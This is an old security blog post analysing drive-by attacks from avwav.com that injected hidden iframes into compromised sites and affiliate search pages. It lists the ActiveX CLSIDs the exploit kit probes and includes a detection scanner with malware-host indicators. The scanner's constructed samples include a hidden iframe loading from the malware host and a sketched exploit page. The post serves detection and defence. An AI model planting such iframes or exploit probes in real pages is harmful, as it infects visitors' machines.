Monday, Jun 02, 2008

Affiliate Search Attacks: Double Dipping?

From mid-May onwards, ScanSafe STAT has observed a series of attacks originating from avwav.com (85.255.120.46). As is so common these days, multiple legitimate sites have been compromised to include an iframe that loads malicious content from that malware host.

The interesting bit is that the attackers were also able to compromise the affiliate search results pages on flysearch.biz: perform a search on flysearch.biz through one of its affiliate pages, and the malicious iframe is embedded at the bottom of the results page. Judging from referrer data, a spam run appears to have included links to these flysearch.biz affiliate pages, complete with an affiliate ID. We saw these repeatedly in May, always with the same affiliate ID. So is this pure coincidence, or is the attacker double dipping, collecting affiliate revenue from the same spammed traffic it is infecting?

The avwav.com attackers target a predictable set of exploits (the list looks like a copy/paste from Metasploit). These are the ActiveX CLSIDs the exploit page probes for:

BD96C556-65A3-11D0-983A-00C04FC29E36
AB9BCEDD-EC7E-47E1-9322-D4A210617116
0006F033-0000-0000-C000-000000000046
0006F03A-0000-0000-C000-000000000046
7F5B7F63-F06F-4331-8A26-339E03C0AE3D
06723E09-F4C2-43c8-8358-09FCD1DB0766
BA018599-1DB3-44f9-83B4-461454C84BF8
D0C07D56-7C69-43F1-B4A0-25F5A11FAB19
E8CCCDDF-CA28-496b-B050-6C07C962476B
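The two artifacts described above, the iframe injected into compromised and affiliate search pages and the CLSID probe list, are both detectable from page content alone. The following scanner is an added example written for this post, not ScanSafe's own tooling; the indicator sets are taken from the post, the 0x0/1x1 "hidden iframe" heuristic is a general rule of thumb rather than something the post states, and the three sample pages are constructed (the exploit page only sketches how a kit references the CLSIDs via an `<object classid>` tag and `new ActiveXObject`).

```python
"""Scan HTML for the two indicators in the post: an iframe pointing at the malware
host, and a page that references the kit's ActiveX CLSIDs.  Added example, not
ScanSafe code.  All sample pages below are constructed."""
import re
from urllib.parse import urlparse

# Indicators from the post.  CLSIDs are normalised to upper case for comparison.
MALWARE_HOSTS = {"avwav.com", "sclgntfy.com"}
MALWARE_IPS = {"85.255.120.46", "85.255.118.12"}
KIT_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E36",
    "AB9BCEDD-EC7E-47E1-9322-D4A210617116",
    "0006F033-0000-0000-C000-000000000046",
    "0006F03A-0000-0000-C000-000000000046",
    "7F5B7F63-F06F-4331-8A26-339E03C0AE3D",
    "06723E09-F4C2-43C8-8358-09FCD1DB0766",
    "BA018599-1DB3-44F9-83B4-461454C84BF8",
    "D0C07D56-7C69-43F1-B4A0-25F5A11FAB19",
    "E8CCCDDF-CA28-496B-B050-6C07C962476B",
}

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
DIM_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?(\d+)""", re.I)
GUID_RE = re.compile(r"[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}", re.I)


def _host_of(url):
    """Lower-case host of an absolute or scheme-relative URL ('' for relative URLs)."""
    if url.startswith("//"):
        url = "http:" + url
    return (urlparse(url).hostname or "").lower()


def _is_malware_host(host):
    return (host in MALWARE_HOSTS or host in MALWARE_IPS
            or any(host.endswith("." + h) for h in MALWARE_HOSTS))


def find_bad_iframes(html):
    """Return [(src, hidden)] for iframes whose src host is a known malware host/IP.
    'hidden' is a heuristic (not from the post): every declared dimension is <= 1px."""
    hits = []
    for attrs in IFRAME_RE.findall(html):
        m = SRC_RE.search(attrs)
        if not m:
            continue
        src = m.group(1)
        if _is_malware_host(_host_of(src)):
            dims = [int(d) for d in DIM_RE.findall(attrs)]
            hidden = bool(dims) and all(d <= 1 for d in dims)
            hits.append((src, hidden))
    return hits


def find_kit_clsids(html):
    """CLSIDs from the kit's probe list found anywhere in the page (object tags,
    ActiveXObject calls, or lightly obfuscated script that still carries the GUIDs)."""
    found = {g.upper() for g in GUID_RE.findall(html)}
    return sorted(found & KIT_CLSIDS)


def classify(html):
    """'exploit' for a page carrying the kit's CLSIDs, 'injected' for a page that
    merely frames the malware host, 'clean' otherwise."""
    if find_kit_clsids(html):
        return "exploit"
    if find_bad_iframes(html):
        return "injected"
    return "clean"


# Constructed sample: an affiliate search results page with the iframe appended at the bottom.
INJECTED_PAGE = """<html><body>
<h1>Results for "cheap flights"</h1>
<ul><li><a href="http://example.com/">example.com</a></li></ul>
</body></html>
<iframe src="http://avwav.com/index.php" width=1 height=1 style="visibility:hidden"></iframe>
"""

# Constructed sample: a landing page probing two CLSIDs from the post's list (hypothetical layout).
EXPLOIT_PAGE = """<html><body>
<object classid="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" id="rds"></object>
<script>
try { var o = new ActiveXObject("{7f5b7f63-f06f-4331-8a26-339e03c0ae3d}"); } catch (e) {}
</script></body></html>
"""

# Constructed sample: a benign embed.
CLEAN_PAGE = '<html><body><iframe src="https://example.org/embed" width="640" height="360"></iframe></body></html>'

if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("exploit", EXPLOIT_PAGE), ("clean", CLEAN_PAGE)):
        print(name, "->", classify(page), find_bad_iframes(page), find_kit_clsids(page))
```

Matching on the raw GUIDs rather than on `classid=` or `ActiveXObject(` catches the common case where the kit's script is obfuscated but still concatenates the literal CLSID strings; a fully encoded landing page would need to be decoded first, which is why the iframe-host check on the compromised site is the more reliable first-line indicator.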

A successful exploit leads to the installation of a backdoor and a downloader. Ivan Macalintal at Trend Micro was able to connect that malware to another host we've seen frequently: sclgntfy.com (85.255.118.12).

Both domains resolve to IP addresses hosted in Ukraine.

Reader Comments (1)

Thank you very much for your great post. Absolutely very useful to me.

June 13, 2008 | Unregistered Commenter ernest
